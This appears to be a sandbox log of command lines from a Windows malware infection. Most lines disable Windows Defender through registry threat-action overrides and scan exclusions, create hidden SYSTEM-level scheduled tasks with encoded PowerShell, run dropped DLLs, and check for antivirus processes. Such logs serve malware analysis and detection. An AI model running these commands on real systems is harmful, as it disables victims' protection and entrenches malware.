"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"

C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Program Files (x86)\1717260008_0\360TS_Setup.exe

"C:\Program Files (x86)\1717260008_0\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gHUBkzNBz" /SC once /ST 00:06:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gHUBkzNBz"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gHUBkzNBz"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 05:18:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe\" 0c /PspKdidaZ 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe 0c /PspKdidaZ 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7664 -ip 7664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7664 -s 688

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\xuHGDU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /c md 331913

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\kJrbVKY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\findstr.exe

findstr /V "EnquiryAnContributionRefers" Tank

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\XgzpZcu.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\ngAfYzJ.xml" /RU "SYSTEM"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\WcNgtzj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5960 -ip 5960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 3168

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\wreHbsL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 06:19:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll\",#1 /kpdidI 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe

"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe" /S zs

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Ph + Shoot 331913\r

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\331913\Rent.pif

331913\Rent.pif 331913\r

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

